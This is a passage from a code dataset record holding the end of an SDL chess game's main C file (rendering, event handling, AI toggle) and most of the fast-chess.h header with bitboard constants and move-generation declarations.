fmt.Rmask, fmt.Gmask, fmt.Bmask, fmt.Amask );\r\n\tSDL_FillRect( checkSurf, NULL, SDL_MapRGB(&fmt, checkColor[0], checkColor[1], checkColor[2]) );\r\n\r\n\tSDL_DestroyTexture(checkSquare);\r\n\tcheckSquare = SDL_CreateTextureFromSurface(renderer, checkSurf);\r\n\r\n\tSDL_SetTextureBlendMode( checkSquare, SDL_BLENDMODE_BLEND );\r\n\tSDL_SetTextureAlphaMod( checkSquare, checkColor[3] );\r\n\tSDL_FreeSurface( checkSurf );\r\n}\r\n\r\nvoid loadLastMoveSquare(void) {\r\n\tconst SDL_PixelFormat fmt = *(screenSurface->format);\r\n\tSDL_Surface * lastMoveSurf = SDL_CreateRGBSurface(0, 10, 10, fmt.BitsPerPixel, 0xff000000, 0xff0000, 0xff00, 0xff );\r\n\r\n\tSDL_FillRect( lastMoveSurf, NULL, SDL_MapRGBA(lastMoveSurf->format, lastMoveColor[0], lastMoveColor[1], lastMoveColor[2], lastMoveColor[3]) );\r\n\tSDL_Rect dest = {1,1,8,8};\r\n\tSDL_FillRect( lastMoveSurf, &dest, SDL_MapRGBA(lastMoveSurf->format,0,0,0,0) );\r\n\r\n\tSDL_DestroyTexture(lastMoveSquare);\r\n\tlastMoveSquare = SDL_CreateTextureFromSurface(renderer, lastMoveSurf);\r\n\r\n\tSDL_SetTextureBlendMode( lastMoveSquare, SDL_BLENDMODE_BLEND );\r\n\tSDL_FreeSurface( lastMoveSurf );\r\n}\r\n\r\nvoid nextColorScheme(void) {\r\n\tint colorCount = (int) (sizeof(COLOR_SQUEMES)/6);\r\n\r\n\tbgColorNum++;\r\n\tbgColorNum %= colorCount;\r\n\r\n\tint i;\r\n\tfor (i=0;i<6;i++)\r\n\t\tBG_COLOR[i] = COLOR_SQUEMES[bgColorNum][i];\r\n\r\n\tloadBackground();\r\n}\r\n\r\nvoid randomColorScheme(void) {\r\n\tint colorCount = (int) (sizeof(COLOR_SQUEMES)/6);\r\n\r\n\tint newColor = rand() % colorCount;\r\n\twhile ( newColor == bgColorNum ) { newColor = rand() % colorCount; }\r\n\tbgColorNum = newColor;\r\n\r\n\tint i;\r\n\tfor (i=0;i<6;i++)\r\n\t\tBG_COLOR[i] = COLOR_SQUEMES[bgColorNum][i];\r\n\r\n\tloadBackground();\r\n}\r\n\r\n\r\nvoid loadRandomTintedBackground(void) {\r\n\tint i;\r\n\tfor (i=0; i<3; i++) {\r\n\t\tint value = (rand() % 256);\r\n\t\tBG_COLOR[i] = (unsigned char) (value + 0.5*(255-value));\r\n\t\tBG_COLOR[i+3] = (unsigned char) value;\r\n\t}\r\n\r\n\tSDL_Surface * bgSurface = createBoardSurface(BG_COLOR);\r\n\r\n\tSDL_DestroyTexture(bgTexture);\r\n\tbgTexture = SDL_CreateTextureFromSurface(renderer, bgSurface);\r\n\r\n\tSDL_FreeSurface( bgSurface );\r\n}\r\n\r\nvoid loadRandomBackground(void) {\r\n\tint i;\r\n\tfor (i=0; i<6; i++) {\r\n\t\tBG_COLOR[i] = (unsigned char) (rand() % 256);\r\n\t}\r\n\r\n\tSDL_Surface * bgSurface = createBoardSurface(BG_COLOR);\r\n\r\n\tSDL_DestroyTexture(bgTexture);\r\n\tbgTexture = SDL_CreateTextureFromSurface(renderer, bgSurface);\r\n\r\n\tSDL_FreeSurface( bgSurface );\r\n}\r\n\r\nvoid loadFont() {\r\n\tfont = TTF_OpenFont(\"open-sans/OpenSans-Bold.ttf\", 48);\r\n}\r\n\r\nBOOL init() {\r\n\tsrand(time(NULL));\r\n\r\n if( SDL_Init( SDL_INIT_VIDEO ) < 0 ) {\r\n printf( \"SDL could not initialize! SDL_Error: %s\\n\", SDL_GetError() );\r\n return FALSE;\r\n }\r\n\r\n\twindow = SDL_CreateWindow( \"Chess Game\", SDL_WINDOWPOS_UNDEFINED, SDL_WINDOWPOS_UNDEFINED, 8*TILE_SIDE, 8*TILE_SIDE, SDL_WINDOW_SHOWN|SDL_WINDOW_RESIZABLE );\r\n\r\n\tif( window == NULL ) {\r\n\t\tprintf( \"Window could not be created! SDL_Error: %s\\n\", SDL_GetError() );\r\n\t\treturn FALSE;\r\n\t}\r\n\r\n\tint imgFlags = IMG_INIT_PNG;\r\n\r\n\tif( !( IMG_Init( imgFlags ) & imgFlags ) ) {\r\n\t\tprintf( \"SDL_image could not initialize! SDL_image Error: %s\\n\", IMG_GetError() );\r\n\t\treturn FALSE;\r\n\t}\r\n\r\n\tif( TTF_Init() == -1 ) {\r\n\t printf(\"TTF_Init error: %s\\n\", TTF_GetError());\r\n\t return FALSE;\r\n\t}\r\n\r\n\tscreenSurface = SDL_GetWindowSurface( window );\r\n\r\n\trenderer = SDL_GetRenderer(window);\r\n\tSDL_SetRenderDrawBlendMode(renderer, SDL_BLENDMODE_BLEND);\r\n\r\n\trandomColorScheme();\r\n\tloadBackground();\r\n\tloadWhiteBackground();\r\n\tloadCheckSquare();\r\n\tloadLastMoveSquare();\r\n\tloadImages();\r\n\tloadHeatTiles();\r\n\tloadFont();\r\n\r\n return TRUE;\r\n}\r\n\r\nvoid setEndTitle(Position * position) {\r\n\tif (isCheckmate(position)) {\r\n\t\tif (position->toMove == BLACK) {\r\n\t\t\tSDL_SetWindowTitle(window, \"Chess Game - WHITE wins!\");\r\n\t\t\tprintf(\"WHITE wins!\\n\");\r\n\t\t} else {\r\n\t\t\tSDL_SetWindowTitle(window, \"Chess Game - BLACK wins!\");\r\n\t\t\tprintf(\"BLACK wins!\\n\");\r\n\t\t}\r\n\t} else if (isStalemate(position)) {\r\n\t\tSDL_SetWindowTitle(window, \"Chess Game - Draw by stalemate!\");\r\n\t\tprintf(\"Draw by stalemate!\\n\");\r\n\t} else if (hasInsufficientMaterial(position->board)) {\r\n\t\tSDL_SetWindowTitle(window, \"Chess Game - Draw by insufficient material!\");\r\n\t\tprintf(\"Draw by insufficient material!\\n\");\r\n\t} else if (isOver75MovesRule(position)) {\r\n\t\tSDL_SetWindowTitle(window, \"Chess Game - Draw by 75-move rule!\");\r\n\t\tprintf(\"Draw by 75-move rule!\\n\");\r\n\t}\r\n\tfflush(stdout);\r\n}\r\n\r\nvoid cyclePiece(Game * game, int leavingPos) {\r\n\tif (game->position.board[leavingPos] == (WHITE|KING)) {\r\n\t\tgame->position.board[leavingPos] = BLACK|PAWN;\r\n\t} else {\r\n\t\tgame->position.board[leavingPos] += 1;\r\n\t\tgame->position.board[leavingPos] %= 15;\r\n\t}\r\n}\r\n\r\nvoid handleEvent(SDL_Event event, Game * game, char * color, BOOL * hasAI, int * AIdepth, BOOL * run, BOOL * ongoing, BOOL * editing, int * leavingPos, int * arrivingPos, Move * lastMove) {\r\n\r\n\tswitch (event.type) {\r\n\tcase SDL_QUIT:\r\n\t\t*run = FALSE;\r\n\t\tbreak;\r\n\r\n\tcase SDL_MOUSEMOTION:\r\n\t\tbreak;\r\n\r\n\tcase SDL_MOUSEBUTTONDOWN:\r\n\t\t*leavingPos = xy2index(event.motion.x, event.motion.y, *color);\r\n\t\tbreak;\r\n\r\n\tcase SDL_MOUSEBUTTONUP:\r\n\t\t*arrivingPos = xy2index(event.motion.x, event.motion.y, *color);\r\n\r\n\t\tif (*editing) {\r\n\t\t\tif (*leavingPos == *arrivingPos) {\r\n\t\t\t\tcyclePiece(game, *leavingPos);\r\n\t\t\t} else {\r\n\t\t\t\tmovePiece(game->position.board, generateMove(*leavingPos, *arrivingPos));\r\n\t\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\t}\r\n\t\t} else {\r\n\t\t\tif ( *ongoing && ( !*hasAI || game->position.toMove == *color) ) {\r\n\t\t\t\tMove moves[MAX_BRANCHING_FACTOR];\r\n\t\t\t\tint moveCount = legalMoves(moves, &(game->position), game->position.toMove);\r\n\r\n\t\t\t\tint i;\r\n\t\t\t\tfor (i=0; i<moveCount; i++) {\r\n\t\t\t\t\tif (generateMove(*leavingPos, *arrivingPos) == moves[i]) {\r\n\t\t\t\t\t\t*lastMove = moves[i];\r\n\r\n\t\t\t\t\t\tprintf(\"Player made move as %s: \", game->position.toMove==WHITE?\"white\":\"black\");\r\n\t\t\t\t\t\tprintFullMove(*lastMove, game->position.board);\r\n\t\t\t\t\t\tprintf(\".\\n\");\r\n\t\t\t\t\t\tfflush(stdout);\r\n\r\n\t\t\t\t\t\tmakeMove(game, *lastMove);\r\n\t\t\t\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\r\n\t\t\t\t\t\tif ( hasGameEnded(&(game->position)) ) {\r\n\t\t\t\t\t\t\t*ongoing = FALSE;\r\n\t\t\t\t\t\t\tsetEndTitle(&(game->position));\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t\tbreak;\r\n\r\n\tcase SDL_KEYDOWN:\r\n\t\tswitch( event.key.keysym.sym ) {\r\n\t\tcase SDLK_a:\r\n\t\t\t*hasAI = *hasAI?FALSE:TRUE;\r\n\t\t\tprintf(\"AI opponent is now %s.\\n\", *hasAI?\"ENABLED\":\"DISABLED\");\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_c:\r\n\t\t\theatmap = FALSE;\r\n\t\t\tnextColorScheme();\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_d:\r\n\t\t\tdumpContent(game);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_e:\r\n\t\t\t*editing = *editing?FALSE:TRUE;\r\n\t\t\tif (*editing) {\r\n\t\t\t\t*lastMove = 0;\r\n\t\t\t} else {\r\n\t\t\t\tgame->position.epSquare = -1;\r\n\t\t\t\tgame->position.castlingRights = CASTLE_KINGSIDE_WHITE|CASTLE_QUEENSIDE_WHITE|CASTLE_KINGSIDE_BLACK|CASTLE_QUEENSIDE_BLACK;\r\n\t\t\t\tgame->position.halfmoveClock = 0;\r\n\t\t\t\tgame->position.fullmoveNumber = 1;\r\n\r\n\t\t\t\tchar fen[MAX_FEN_LEN];\r\n\t\t\t\ttoFen(fen, &(game->position));\r\n\t\t\t\tgetFenGame(game, fen);\r\n\t\t\t}\r\n\t\t\tprintf(\"Editing %s.\\n\", *editing?\"enabled\":\"disabled\");\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_h:\r\n\t\t\theatmap = heatmap?FALSE:TRUE;\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tprintf(\"Heatmap %s.\\n\", heatmap?\"enabled\":\"disabled\");\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_i:\r\n\t\t\t*color = opponent(*color);\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tprintf(\"Now playing as %s.\\n\", *color==WHITE?\"WHITE\":\"BLACK\");\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_m:\r\n\t\t\tprintLegalMoves(&(game->position));\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_p:\r\n\t\t\tdumpPGN(game, *color, *hasAI);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_q:\r\n\t\tcase SDLK_ESCAPE:\r\n\t\t\t*run = FALSE;\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_r:\r\n\t\t\theatmap = FALSE;\r\n\t\t\tloadRandomBackground();\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_t:\r\n\t\t\theatmap = FALSE;\r\n\t\t\tloadRandomTintedBackground();\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_u:\r\n\t\t\tif (*editing) return;\r\n\t\t\tunmakeMove(game);\r\n\t\t\tif ( *hasAI ) unmakeMove(game);\r\n\t\t\tSDL_SetWindowTitle(window, \"Chess Game\");\r\n\t\t\t*ongoing = TRUE;\r\n\t\t\t*lastMove = getLastMove(game);\r\n\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\tprintf(\"Last move was undone.\\n\");\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_v:\r\n\t\t\tprintf(\"Board evaluation = %.2f\\n\", staticEvaluation(&(game->position))/100.0);\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_UP:\r\n\t\t\t(*AIdepth)++;\r\n\t\t\tprintf(\"Search base depth increased to %d.\\n\", *AIdepth);\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tcase SDLK_DOWN:\r\n\t\t\tif (*AIdepth==1) {\r\n\t\t\t\tprintf(\"Search base depth is 1.\\n\");\r\n\t\t\t} else {\r\n\t\t\t\t(*AIdepth)--;\r\n\t\t\t\tprintf(\"Search base depth decreased to %d.\\n\", *AIdepth);\r\n\t\t\t}\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\r\n\t\tdefault:\r\n//\t\t\tprintf(\"User pressed key: '%s' key acting as '%s' key\\n\", SDL_GetScancodeName(event.key.keysym.scancode), SDL_GetKeyName(event.key.keysym.sym));\r\n\t\t\tprintf(\"Pressing '%s' does nothing!\\n\", SDL_GetKeyName(event.key.keysym.sym));\r\n\t\t\tfflush(stdout);\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tbreak;\r\n\r\n\t\tcase SDL_WINDOWEVENT:\r\n\t\t\tswitch (event.window.event) {\r\n\t\t\tcase SDL_WINDOWEVENT_RESIZED:\r\n\t\t\t\tif ( event.window.data1 != 8*TILE_SIDE ) {\r\n\t\t\t\t\tTILE_SIDE = (int) (event.window.data1/8);\r\n\t\t\t\t} else if ( event.window.data2 != 8*TILE_SIDE ) {\r\n\t\t\t\t\tTILE_SIDE = (int) (event.window.data2/8);\r\n\t\t\t\t}\r\n\t\t\t\tSDL_SetWindowSize(window, 8*TILE_SIDE, 8*TILE_SIDE);\r\n\t\t\t\trenderBoard(game->position.board, *color, *lastMove);\r\n\t\t\t\tfflush(stdout);\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t}\r\n}\r\n\r\nvoid play(char color, BOOL hasAI, int AIdepth) {\r\n\thasAI?printf(\"Playing as %s!\\n\", color==WHITE?\"WHITE\":\"BLACK\"):printf(\"Playing as both colors!\\n\");\r\n\tfflush(stdout);\r\n\r\n\tGame game;\r\n\tgetInitialGame(&game);\r\n\r\n\tBOOL run = TRUE, ongoing = TRUE, editing = FALSE;\r\n\tSDL_Event event;\r\n\r\n\tint leavingPos = -1, arrivingPos = -1;\r\n\tMove lastMove = 0;\r\n\r\n\twhile( run ) {\r\n\t\trenderBoard(game.position.board, color, lastMove);\r\n\r\n\t\tif ( hasAI && ongoing && !editing && game.position.toMove == opponent(color) ) {\r\n\t\t\tSDL_SetWindowTitle(window, \"Chess Game - Calculating move...\");\r\n\t\t\tlastMove = getAIMove(&game, AIdepth);\r\n\t\t\tmakeMove(&game, lastMove);\r\n\t\t\tSDL_SetWindowTitle(window, \"Chess Game\");\r\n\t\t\trenderBoard(game.position.board, color, lastMove);\r\n\r\n\t\t\tif ( hasGameEnded(&game.position) ) {\r\n\t\t\t\tongoing = FALSE;\r\n\t\t\t\tsetEndTitle(&game.position);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\twhile( SDL_PollEvent( &event ) == 0 );\r\n\t\thandleEvent(event, &game, &color, &hasAI, &AIdepth, &run, &ongoing, &editing, &leavingPos, &arrivingPos, &lastMove);\r\n\t}\r\n}\r\n\r\nvoid playAIRandomColor(int depth) {\r\n\tchar colors[] = {WHITE, BLACK};\r\n\tchar color = colors[rand()%2];\r\n\tplay(color, TRUE, depth);\r\n}\r\n\r\nvoid playAlone() { play(WHITE, FALSE, 0); }\r\n\r\nint main( int argc, char* args[] ) {\r\n\tif ( !init() ) {\r\n\t\tfflush(stdout);\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\r\n\tplayAIRandomColor(DEFAULT_AI_DEPTH);\r\n//\tplayAlone();\r\n\r\n//\tprintf(\"Position\\t%d bytes\\n\", sizeof(Position));\r\n//\tprintf(\"Board\\t\\t%d bytes\\n\", NUM_SQUARES*sizeof(int));\r\n//\tprintf(\"To move\\t\\t%d bytes\\n\", sizeof(char));\r\n//\tprintf(\"En passant\\t%d bytes\\n\", sizeof(char));\r\n//\tprintf(\"Castling\\t%d bytes\\n\", sizeof(char));\r\n//\tprintf(\"Half move\\t%d bytes\\n\", sizeof(int));\r\n//\tprintf(\"Full move\\t%d bytes\\n\", sizeof(int));\r\n//\tfflush(stdout);\r\n\r\n\tclose();\r\n\r\n\treturn EXIT_SUCCESS;\r\n}\r\n" }, { "alpha_fraction": 0.6798844933509827, "alphanum_fraction": 0.7145422101020813, "avg_line_length": 32.90735626220703, "blob_id": "39bdac3dc2f5c0b8eb5acf8cb3f5fc12f4fe2a07", "content_id": "d726724461471a9a01b5e63953212216cfedef14", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 12811, "license_type": "permissive", "max_line_length": 163, "num_lines": 367, "path": "/include/fast-chess.h", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "/*\r\n * fast-chess.h\r\n *\r\n * Created on: 20 de set de 2016\r\n * Author: fvj\r\n */\r\n\r\n#ifndef FAST_CHESS_H_\r\n#define FAST_CHESS_H_\r\n\r\n#ifdef _WIN32\r\n#include <windows.h>\r\n#endif\r\n\r\n#include <stdint.h>\r\n\r\n#define ENGINE_VERSION \"v1.6.3\"\r\n\r\n#define ENGINE_NAME \"github.com/fredericojordan/fast-chess \" ENGINE_VERSION\r\n#define HUMAN_NAME \"Unknown Human Player\"\r\n\r\n#define NUM_SQUARES (64)\r\n#define ENDGAME_PIECE_COUNT (7)\r\n\r\n#define COLOR_MASK (1<<3)\r\n#define WHITE (0)\r\n#define BLACK (1<<3)\r\n\r\n#define PIECE_MASK (0x7)\r\n#define EMPTY (0)\r\n#define PAWN (1)\r\n#define KNIGHT (2)\r\n#define BISHOP (3)\r\n#define ROOK (4)\r\n#define QUEEN (5)\r\n#define KING (6)\r\n\r\n#define ALL_SQUARES (0xFFFFFFFFFFFFFFFF)\r\n#define FILE_A (0x0101010101010101)\r\n#define FILE_B (0x0202020202020202)\r\n#define FILE_C (0x0404040404040404)\r\n#define FILE_D (0x0808080808080808)\r\n#define FILE_E (0x1010101010101010)\r\n#define FILE_F (0x2020202020202020)\r\n#define FILE_G (0x4040404040404040)\r\n#define FILE_H (0x8080808080808080)\r\n#define RANK_1 (0x00000000000000FF)\r\n#define RANK_2 (0x000000000000FF00)\r\n#define RANK_3 (0x0000000000FF0000)\r\n#define RANK_4 (0x00000000FF000000)\r\n#define RANK_5 (0x000000FF00000000)\r\n#define RANK_6 (0x0000FF0000000000)\r\n#define RANK_7 (0x00FF000000000000)\r\n#define RANK_8 (0xFF00000000000000)\r\n#define DIAG_A1H8 (0x8040201008040201)\r\n#define ANTI_DIAG_H1A8 (0x0102040810204080)\r\n#define LIGHT_SQUARES (0x55AA55AA55AA55AA)\r\n#define DARK_SQUARES (0xAA55AA55AA55AA55)\r\n\r\n#define CASTLE_KINGSIDE_WHITE (1<<0)\r\n#define CASTLE_QUEENSIDE_WHITE (1<<1)\r\n#define CASTLE_KINGSIDE_BLACK (1<<2)\r\n#define CASTLE_QUEENSIDE_BLACK (1<<3)\r\n\r\n#define BOOL char\r\n\r\n#ifndef FALSE\r\n#define TRUE (1)\r\n#define FALSE (0)\r\n#endif\r\n\r\ntypedef uint_fast64_t Bitboard;\r\ntypedef int Move;\r\n\r\n#define MAX_BOOK_ENTRY_LEN (300)\r\n#define MAX_PLYS_PER_GAME (1024)\r\n#define MAX_FEN_LEN (100)\r\n#define MAX_BRANCHING_FACTOR (218) /* R6R/3Q4/1Q4Q1/4Q3/2Q4Q/Q4Q2/pp1Q4/kBNN1KB1 w - - 0 1 3Q4/1Q4Q1/4Q3/2Q4R/Q4Q2/3Q4/1Q4Rp/1K1BBNNk w - - 0 1 */\r\n#define MAX_ATTACKING_PIECES (12)\r\n\r\n#define DEFAULT_AI_DEPTH (3)\r\n\r\ntypedef struct {\r\n int board[NUM_SQUARES];\r\n char toMove;\r\n char epSquare;\r\n char castlingRights;\r\n unsigned int halfmoveClock;\r\n unsigned int fullmoveNumber;\r\n} Position;\r\n\r\ntypedef struct {\r\n\tPosition position;\r\n\r\n\tunsigned int moveListLen;\r\n\tMove moveList[MAX_PLYS_PER_GAME];\r\n\tchar positionHistory[MAX_PLYS_PER_GAME][MAX_FEN_LEN];\r\n} Game;\r\n\r\ntypedef struct {\r\n\tMove move;\r\n\tint score;\r\n} Node;\r\n\r\ntypedef struct {\r\n\tint depth;\r\n\tPosition pos;\r\n\tint * alpha;\r\n\tint * beta;\r\n\tBOOL verbose;\r\n} ThreadInfo;\r\n\r\nextern char FILES[8];\r\nextern char RANKS[8];\r\n\r\nextern Bitboard FILES_BB[8];\r\nextern Bitboard RANKS_BB[8];\r\n\r\nextern char INITIAL_FEN[];\r\nextern int INITIAL_BOARD[NUM_SQUARES];\r\nextern int PIECE_VALUES[];\r\n\r\n#define DOUBLED_PAWN_PENALTY (10)\r\n#define ISOLATED_PAWN_PENALTY (20)\r\n#define BACKWARDS_PAWN_PENALTY (8)\r\n#define PASSED_PAWN_BONUS (20)\r\n#define ROOK_SEMI_OPEN_FILE_BONUS (10)\r\n#define ROOK_OPEN_FILE_BONUS (15)\r\n#define ROOK_ON_SEVENTH_BONUS (20)\r\n\r\nextern int PAWN_BONUS[];\r\nextern int KNIGHT_BONUS[];\r\nextern int BISHOP_BONUS[];\r\nextern int KING_BONUS[];\r\nextern int KING_ENDGAME_BONUS[];\r\nextern int FLIP_VERTICAL[];\r\n\r\nvoid getInitialGame(Game * game);\r\nvoid getFenGame(Game * game, char fen[]);\r\nint loadFen(Position * position, char fen[]);\r\nint toFen(char * fen, Position * position);\r\nint toMinFen(char * fen, Position * position);\r\n\r\n// ========= UTILITY =========\r\n\r\nBOOL fromInitial(Game * game);\r\nBitboard index2bb(int index);\r\nint str2index(char *str);\r\nBitboard str2bb(char *str);\r\nBOOL isSet(Bitboard bb, int index);\r\nBitboard lsb(Bitboard bb);\r\nBitboard msb(Bitboard bb);\r\nint bb2index(Bitboard bb);\r\nchar * movelist2str(Game * game);\r\nMove getLastMove(Game * game);\r\nBOOL startsWith(const char *str, const char *pre);\r\nint countBookOccurrences(Game * game);\r\nMove getBookMove(Game * game);\r\nchar getFile(int position);\r\nchar getRank(int position);\r\nMove generateMove(int leavingSquare, int arrivingSquare);\r\nint getFrom(Move move);\r\nint getTo(Move move);\r\nint char2piece(char pieceCode);\r\nchar piece2char(int piece);\r\nchar * piece2str(int piece);\r\nvoid printBitboard(Bitboard bitboard);\r\nvoid printBoard(int board[]);\r\nvoid printGame(Game * game);\r\nBitboard not(Bitboard bb);\r\nchar opponent(char color);\r\nint countBits(Bitboard bb);\r\nvoid sortNodes(Node * sortedNodes, Node * nodes, int len, char color);\r\nvoid printMove(Move move);\r\nvoid printFullMove(Move move, int board[]);\r\nvoid printLegalMoves(Position * position);\r\nvoid printNode(Node node);\r\nvoid getTimestamp(char * timestamp);\r\nvoid dumpContent(Game * game);\r\nvoid dumpPGN(Game * game, char color, BOOL hasAI);\r\nvoid move2str(char * str, Game * game, int moveNumber);\r\nBOOL isAmbiguous(Position * posBefore, Move move);\r\nunsigned long hashPosition(Position * position);\r\nvoid writeToHashFile(Position * position, int evaluation, int depth);\r\n\r\n// ====== BOARD FILTERS ======\r\n\r\nBitboard getColoredPieces(int board[], char color);\r\nBitboard getEmptySquares(int board[]);\r\nBitboard getOccupiedSquares(int board[]);\r\nBitboard getPieces(int board[], int pieceType);\r\nBitboard fileFilter(Bitboard positions);\r\nBitboard rankFilter(Bitboard positions);\r\nchar countPieces(Bitboard bitboard);\r\n\r\n// ======= DIRECTIONS ========\r\n\r\nBitboard east(Bitboard bb);\r\nBitboard west(Bitboard bb);\r\nBitboard north(Bitboard bb);\r\nBitboard south(Bitboard bb);\r\nBitboard NE(Bitboard bb);\r\nBitboard NW(Bitboard bb);\r\nBitboard SE(Bitboard bb);\r\nBitboard SW(Bitboard bb);\r\nBitboard WNW(Bitboard moving_piece);\r\nBitboard ENE(Bitboard moving_piece);\r\nBitboard NNW(Bitboard moving_piece);\r\nBitboard NNE(Bitboard moving_piece);\r\nBitboard ESE(Bitboard moving_piece);\r\nBitboard WSW(Bitboard moving_piece);\r\nBitboard SSE(Bitboard moving_piece);\r\nBitboard SSW(Bitboard moving_piece);\r\n\r\n// ========== PAWN ===========\r\n\r\nBitboard getPawns(int board[]);\r\nBitboard pawnSimplePushes(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnDoublePushes(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnPushes(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnEastAttacks(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnWestAttacks(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnAttacks(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnSimpleCaptures(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnEpCaptures(Bitboard moving_piece, Position * position, char color);\r\nBitboard pawnCaptures(Bitboard moving_piece, Position * position, char color);\r\nBitboard pawnMoves(Bitboard moving_piece, Position * position, char color);\r\nBOOL isDoublePush(int leaving, int arriving);\r\nchar getEpSquare(int leaving);\r\nBOOL isDoubledPawn(Bitboard position, int board[]);\r\nBOOL isIsolatedPawn(Bitboard position, int board[]);\r\nBOOL isBackwardsPawn(Bitboard position, int board[]);\r\nBOOL isPassedPawn(Bitboard position, int board[]);\r\nBOOL isOpenFile(Bitboard position, int board[]);\r\nBOOL isSemiOpenFile(Bitboard position, int board[]);\r\n\r\n// ========== KNIGHT =========\r\n\r\nBitboard getKnights(int board[]);\r\nBitboard knightAttacks(Bitboard moving_piece);\r\nBitboard knightMoves(Bitboard moving_piece, int board[], char color);\r\n\r\n// ========== KING ===========\r\n\r\nBitboard getKing(int board[], char color);\r\nBitboard kingAttacks(Bitboard moving_piece);\r\nBitboard kingMoves(Bitboard moving_piece, int board[], char color) ;\r\nBOOL canCastleKingside(Position * position, char color);\r\nBOOL canCastleQueenside(Position * position, char color);\r\nchar removeCastlingRights(char original_rights, char removed_rights);\r\n\r\n// ========== BISHOP =========\r\n\r\nBitboard getBishops(int board[]);\r\nBitboard NE_ray(Bitboard bb);\r\nBitboard SE_ray(Bitboard bb);\r\nBitboard NW_ray(Bitboard bb);\r\nBitboard SW_ray(Bitboard bb);\r\nBitboard NE_attack(Bitboard single_piece, int board[], char color);\r\nBitboard NW_attack(Bitboard single_piece, int board[], char color);\r\nBitboard SE_attack(Bitboard single_piece, int board[], char color);\r\nBitboard SW_attack(Bitboard single_piece, int board[], char color);\r\nBitboard diagonalAttacks(Bitboard single_piece, int board[], char color);\r\nBitboard antiDiagonalAttacks(Bitboard single_piece, int board[], char color);\r\nBitboard bishopAttacks(Bitboard moving_pieces, int board[], char color);\r\nBitboard bishopMoves(Bitboard moving_piece, int board[], char color);\r\n\r\n// ========== ROOK ===========\r\n\r\nBitboard getRooks(int board[]);\r\nBitboard northRay(Bitboard moving_pieces);\r\nBitboard southRay(Bitboard moving_pieces);\r\nBitboard eastRay(Bitboard moving_pieces);\r\nBitboard westRay(Bitboard moving_pieces);\r\nBitboard northAttack(Bitboard single_piece, int board[], char color);\r\nBitboard southAttack(Bitboard single_piece, int board[], char color);\r\nBitboard fileAttacks(Bitboard single_piece, int board[], char color);\r\nBitboard eastAttack(Bitboard single_piece, int board[], char color);\r\nBitboard westAttack(Bitboard single_piece, int board[], char color);\r\nBitboard rankAttacks(Bitboard single_piece, int board[], char color);\r\nBitboard rookAttacks(Bitboard moving_piece, int board[], char color);\r\nBitboard rookMoves(Bitboard moving_piece, int board[], char color);\r\n\r\n// ========== QUEEN ==========\r\n\r\nBitboard getQueens(int board[]);\r\nBitboard queenAttacks(Bitboard moving_piece, int board[], char color);\r\nBitboard queenMoves(Bitboard moving_piece, int board[], char color);\r\n\r\n// ======== MAKE MOVE ========\r\n\r\nvoid movePiece(int board[], Move move);\r\nvoid updatePosition(Position * newPosition, Position * position, Move move);\r\nvoid makeMove(Game * game, Move move);\r\nvoid unmakeMove(Game * game);\r\n\r\n// ======== MOVE GEN =========\r\n\r\nBitboard getMoves(Bitboard movingPiece, Position * position, char color);\r\nint pseudoLegalMoves(Move * moves, Position * position, char color);\r\nBitboard getAttacks(Bitboard movingPiece, int board[], char color);\r\nint countAttacks(Bitboard target, int board[], char color);\r\nBOOL isAttacked(Bitboard target, int board[], char color);\r\nBOOL isCheck(int board[], char color);\r\nBOOL isLegalMove(Position * position, Move move);\r\nint legalMoves(Move * legalMoves, Position * position, char color);\r\nint legalMovesCount(Position * position, char color);\r\nint staticOrderLegalMoves(Move * orderedLegalMoves, Position * position, char color);\r\nint legalCaptures(Move * legalCaptures, Position * position, char color);\r\n\r\n// ====== GAME CONTROL =======\r\n\r\nBOOL isCheckmate(Position * position);\r\nBOOL isStalemate(Position * position);\r\nBOOL hasInsufficientMaterial(int board[]);\r\nBOOL isEndgame(int board[]);\r\nBOOL isOver75MovesRule(Position * position);\r\nBOOL hasGameEnded(Position * position);\r\nvoid printOutcome(Position * position);\r\n\r\n// ========== EVAL ===========\r\n\r\nint winScore(char color);\r\nint materialSum(int board[], char color);\r\nint materialBalance(int board[]);\r\nint 